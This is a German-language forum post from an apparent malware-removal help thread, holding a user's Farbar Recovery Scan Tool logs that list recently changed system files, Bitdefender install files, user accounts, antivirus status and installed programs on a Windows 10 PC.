2017-05-16 18:06 - 2017-04-14 21:33 - 00551808 _____ C:\WINDOWS\system32\dgtrayicon.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00546688 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\Rapidfire64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00531328 _____ C:\WINDOWS\system32\GameManager64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00478080 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\Rapidfire.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00365440 _____ C:\WINDOWS\SysWOW64\GameManager32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00278400 _____ C:\WINDOWS\system32\clinfo.exe
2017-05-16 18:06 - 2017-04-14 21:33 - 00276352 _____ C:\WINDOWS\system32\hsa-thunk64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00242048 _____ C:\WINDOWS\SysWOW64\hsa-thunk.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00191360 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantle64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00169856 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\mantleaxl64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00167808 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atisamu64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00150912 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantle32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00135040 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\mantleaxl32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00133504 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atisamu32.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00044920 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\RapidFireServer64.dll
2017-05-16 18:06 - 2017-04-14 21:33 - 00042368 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\RapidFireServer.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01516416 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 01040768 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\atiadlxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00777088 _____ (AMD) C:\WINDOWS\system32\atieclxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00551808 _____ (AMD) C:\WINDOWS\system32\atiesrxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00483712 _____ C:\WINDOWS\system32\atieah64.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00467328 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atidemgy.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00411008 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\atiapfxx.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00334208 _____ C:\WINDOWS\SysWOW64\atieah32.exe
2017-05-16 18:06 - 2017-04-14 21:32 - 00245112 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atig6txx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00203648 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atigktxx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00156704 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\aticfx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00148440 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\aticfx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00122744 _____ (AMD) C:\WINDOWS\system32\atimuixx.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00115072 _____ C:\WINDOWS\system32\atidxx64.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00101760 _____ C:\WINDOWS\SysWOW64\atidxx32.dll
2017-05-16 18:06 - 2017-04-14 21:32 - 00068992 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\ati2erec.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 10320248 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdvlk64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 08479104 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdvlk32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02536320 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amfrt64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 02198400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amfrt32.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00112512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdxc64.dll
2017-05-16 18:06 - 2017-04-14 21:31 - 00099192 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdxc32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00864120 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdlvr64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00696192 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdlvr32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00514424 _____ C:\WINDOWS\system32\amdgfxinfo64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00360312 _____ C:\WINDOWS\SysWOW64\amdgfxinfo32.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00091520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdmcl64.dll
2017-05-16 18:06 - 2017-04-14 21:30 - 00075136 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdmcl32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00573800 _____ C:\WINDOWS\system32\amdmiracast.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00196176 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\system32\amdhcp64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00164400 _____ (Advanced Micro Devices, Inc.) C:\WINDOWS\SysWOW64\amdhcp32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00139080 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdave64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\atimpc64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00131280 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\system32\amdpcom64.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00116072 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdave32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102520 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\amdpcom32.dll
2017-05-16 18:05 - 2017-04-14 21:28 - 00102512 _____ (Advanced Micro Devices, Inc. ) C:\WINDOWS\SysWOW64\atimpc32.dll
2017-05-12 20:28 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-05-12 19:35 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-05-10 21:47 - 2015-08-16 13:45 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-05-09 23:04 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-05-09 21:42 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-05-09 21:42 - 2015-05-01 17:30 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-05-09 21:40 - 2015-05-01 17:30 - 156335152 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-05-09 21:32 - 2015-04-25 06:35 - 00000000 ____D C:\Users\Dino\AppData\Local\Packages
2017-05-09 21:23 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2017-05-08 22:37 - 2017-03-11 17:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2017-05-08 21:19 - 2015-04-25 07:09 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2017-05-08 21:13 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-05-07 21:26 - 2015-08-16 13:47 - 00002419 _____ C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-05-07 21:24 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-05-07 18:12 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-05-07 18:11 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-05-07 18:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-05-07 18:11 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-05-07 18:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-05-07 18:09 - 2017-03-18 22:56 - 00465408 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00389632 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnet.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00217600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplayx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00067584 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00061440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnathlp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00046592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpwsockx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00027136 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00024576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpmodemx.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00022528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnsvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00020480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dplaysvr.exe
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhupnp.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00008704 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnhpast.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00006144 _____ (Microsoft Corporation) C:\WINDOWS\system32\dpnaddr.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnlobby.dll
2017-05-07 18:09 - 2017-03-18 22:56 - 00005120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dpnaddr.dll
2017-05-07 17:20 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-05-07 17:19 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-05-07 17:18 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-05-07 17:17 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-05-07 17:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-05-07 17:17 - 2015-08-16 13:44 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-05-07 17:16 - 2017-03-29 15:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ElsterFormular
2017-05-07 17:16 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-05-07 17:16 - 2017-02-19 12:30 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2017
2017-05-07 17:16 - 2017-02-05 21:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bitdefender 2017
2017-05-07 17:16 - 2017-01-22 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SHARKOON Drakonia
2017-05-07 17:16 - 2016-02-13 13:26 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WISO steuer Start 2016
2017-05-07 17:16 - 2015-08-22 17:13 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SimCity™
2017-05-07 17:16 - 2015-08-22 14:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Origin
2017-05-07 17:16 - 2015-05-24 14:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Unlocker
2017-05-07 17:16 - 2015-05-24 12:10 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Xbox 360 Accessories
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-05-24 12:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\WINDOWS\system32\STRING
2017-05-07 17:16 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon MG5600 series Benutzerregistrierung
2017-05-07 17:16 - 2015-04-26 15:12 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-26 14:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-05-07 17:16 - 2015-04-26 14:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-05-07 17:16 - 2015-04-26 13:55 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\JDownloader
2017-05-07 17:16 - 2015-04-26 13:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StarCraft II
2017-05-07 17:16 - 2015-04-26 13:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Battle.net
2017-05-07 17:16 - 2015-04-25 17:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2017-05-07 17:16 - 2015-04-25 07:59 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CrystalDiskInfo
2017-05-07 17:16 - 2015-04-25 07:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung Magician
2017-05-07 17:16 - 2015-04-25 07:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ASUS
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\GroupPolicy
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lv-LV
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\lt-LT
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\InputMethod
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\et-EE
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\en-GB
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-05-07 17:14 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\InputMethod
2017-05-07 17:14 - 2017-01-29 17:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavalys
2017-05-07 17:14 - 2017-01-22 15:26 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Hammer & Chisel, Inc
2017-05-07 17:14 - 2016-11-30 18:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PDF24
2017-05-07 17:14 - 2016-11-30 18:10 - 00000000 ____D C:\WINDOWS\system32\ÿÿÿÿÿÿÿÿ8
2017-05-07 17:14 - 2016-05-01 13:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Vulkan 1.0.3.1
2017-05-07 17:14 - 2015-08-31 18:03 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Samsung
2017-05-07 17:14 - 2015-04-26 15:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Canon Utilities
2017-05-07 17:14 - 2015-04-26 14:43 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Paradox Interactive
2017-05-07 17:14 - 2015-04-25 17:37 - 00000000 ____D C:\Users\Dino\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft
2017-05-07 17:14 - 2015-04-25 07:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Realtek
2017-05-07 17:14 - 2015-04-25 07:16 - 00000000 ____D C:\Program Files\Intel
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Shared
2017-05-07 17:14 - 2013-08-22 17:36 - 00000000 ____D C:\WINDOWS\system32\WindowsInternal.Inbox.Media.Shared
2017-05-07 17:13 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-05-01 12:45 - 2015-04-25 07:04 - 00000000 ____D C:\ProgramData\AMD
2017-05-01 12:44 - 2016-05-01 13:18 - 00000000 ____D C:\Program Files (x86)\VulkanRT
2017-05-01 12:17 - 2016-09-30 17:45 - 00000000 ____D C:\ProgramData\Package Cache
2017-05-01 10:53 - 2015-04-25 17:43 - 00000000 ____D C:\Users\Dino\AppData\Local\Steam
2017-04-29 03:05 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-04-29 03:05 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\SysWOW64\atiapfxx.blb
2017-04-25 01:06 - 2017-04-14 01:44 - 00795616 _____ C:\WINDOWS\system32\atiapfxx.blb
2017-04-25 00:56 - 2017-04-14 01:44 - 03437632 _____ C:\WINDOWS\system32\atiumd6a.cap
2017-04-25 00:51 - 2017-04-14 01:44 - 03471376 _____ C:\WINDOWS\SysWOW64\atiumdva.cap
2017-04-22 19:40 - 2015-04-26 13:54 - 00000000 ____D C:\Users\Dino\AppData\Local\JDownloader v2.0
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2015-04-25 17:18 - 2017-01-27 23:52 - 0007601 _____ () C:\Users\Dino\AppData\Local\Resmon.ResmonCfg
2017-02-05 19:40 - 2017-02-05 19:40 - 0046145 _____ () C:\ProgramData\agent.1486316443.bdinstall.bin
2017-02-05 20:08 - 2017-02-05 20:08 - 0026583 _____ () C:\ProgramData\agent.1486318128.bdinstall.bin
2017-02-05 20:09 - 2017-02-05 20:09 - 0026510 _____ () C:\ProgramData\agent.1486318150.bdinstall.bin
2017-02-05 20:52 - 2017-02-05 20:52 - 0046366 _____ () C:\ProgramData\agent.1486320772.bdinstall.bin
2017-02-05 20:55 - 2017-02-05 20:55 - 0028837 _____ () C:\ProgramData\agent.1486320909.bdinstall.bin
2017-02-05 20:57 - 2017-02-05 20:57 - 0046212 _____ () C:\ProgramData\agent.1486321078.bdinstall.bin
2017-02-05 21:01 - 2017-02-05 21:01 - 0026790 _____ () C:\ProgramData\agent.1486321314.bdinstall.bin
2017-02-05 21:02 - 2017-02-05 21:02 - 0028833 _____ () C:\ProgramData\agent.1486321377.bdinstall.bin
2017-02-05 21:11 - 2017-02-05 21:11 - 0046370 _____ () C:\ProgramData\agent.1486321901.bdinstall.bin
2017-02-09 19:09 - 2017-02-09 19:09 - 0028754 _____ () C:\ProgramData\agent.1486660167.bdinstall.bin
2017-03-08 21:56 - 2017-03-08 21:56 - 0029970 _____ () C:\ProgramData\agent.update.1489002971.bdinstall.bin
2017-02-05 21:15 - 2017-02-05 21:15 - 0381546 _____ () C:\ProgramData\cl.1486322005.bdinstall.bin
2017-02-05 21:17 - 2017-02-05 21:17 - 0055877 _____ () C:\ProgramData\dm.1486322271.bdinstall.bin
2017-02-07 23:33 - 2017-02-07 23:33 - 0035238 _____ () C:\ProgramData\dm.1486503192.bdinstall.bin
2017-05-07 17:13 - 2017-05-07 17:13 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Einige Dateien in TEMP:
====================
2017-05-19 14:16 - 2017-05-19 14:16 - 7178424 _____ (VS Revo Group ) C:\Users\Dino\AppData\Local\Temp\VSUSetup.exe
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-05-19 15:19
==================== Ende von FRST.txt
|
|
21.05.2017, 20:14
| #5 |
| | Trojaner, Adware oder sonstiges ?Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 20-05-2017
durchgeführt von Dino (21-05-2017 21:05:18)
Gestartet von D:\Dino\Downloads
Windows 10 Pro Version 1703 (X64) (2017-05-07 15:20:06)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-3554052566-3312977812-1675691648-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3554052566-3312977812-1675691648-503 - Limited - Disabled)
Dino (S-1-5-21-3554052566-3312977812-1675691648-1001 - Administrator - Enabled) => C:\Users\Dino
Gast (S-1-5-21-3554052566-3312977812-1675691648-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3554052566-3312977812-1675691648-1003 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Virenschutz (Enabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Spyware-Schutz (Enabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: Bitdefender Firewall (Enabled) {078AF241-05A3-0EFF-40E0-3E0D69EA140A}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
ACP Application (Version: 2016.0321.0955.20 - Advanced Micro Devices, Inc.) Hidden
Adblock Plus für IE (32-Bit- und 64-Bit) (HKLM\...\{C27EF409-FB69-451F-B996-DC853C25FCA2}) (Version: 1.4 - Eyeo GmbH)
Adobe Flash Player 25 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 25.0.0.171 - Adobe Systems Incorporated)
AI Suite 3 (HKLM-x32\...\{CD36E28B-6023-469A-91E7-049A2874EC13}) (Version: 1.00.92 - ASUSTeK Computer Inc.)
AMD Settings (HKLM\...\WUCCCApp) (Version: 2017.0424.2119.36535 - Advanced Micro Devices, Inc.)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 9.0.000.8 - Advanced Micro Devices, Inc.)
ANNO 1404 - Königsedition (HKLM-x32\...\{3D9CF3CA-3AB0-4A82-9853-D7C43FD1D775}) (Version: 3.10.0000 - Ubisoft)
ANNO 2070 (HKLM-x32\...\{B48E264C-C8CD-4617-B0BE-46E977BAD694}) (Version: 1.0.0.0 - Ubisoft)
Anno 2205 (HKLM-x32\...\Uplay Install 1253) (Version: - Ubisoft)
ASUS GPU Tweak (HKLM-x32\...\InstallShield_{532F6E8A-AF97-41C3-915F-39F718EC07D1}) (Version: 2.8.2.0 - ASUSTek COMPUTER INC.)
ASUS GPU Tweak (x32 Version: 2.8.2.0 - ASUSTek COMPUTER INC.) Hidden
Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment)
Besiege (HKLM-x32\...\Steam App 346010) (Version: - Spiderling Studios)
Bitdefender Agent (HKLM\...\Bitdefender Agent) (Version: 21.0.18.898 - Bitdefender)
Bitdefender Internet Security 2017 (HKLM\...\Bitdefender) (Version: 21.0.23.1101 - Bitdefender)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.5.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX) (Version: 1.5.2.3 - Canon Inc.)
Canon IJ Network Tool (HKLM-x32\...\Canon_IJ_Network_UTILITY) (Version: 3.5.0 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.1.10.15 - Canon Inc.)
Canon MG5600 series Benutzerregistrierung (HKLM-x32\...\Canon MG5600 series Benutzerregistrierung) (Version: - *Canon Inc.)
Canon MG5600 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MG5600_series) (Version: 1.00 - Canon Inc.)
Canon My Printer (HKLM-x32\...\CanonMyPrinter) (Version: 3.2.1 - Canon Inc.)
Catalyst Control Center Next Localization BR (Version: 2016.0624.1251.21301 - Advanced Micro Devices, Inc.) Hidden
Catalyst Control Center Next Localization BR (Version: 2016.0916.1515.27418 - Advanced Micro Devices, Inc.) Hidden
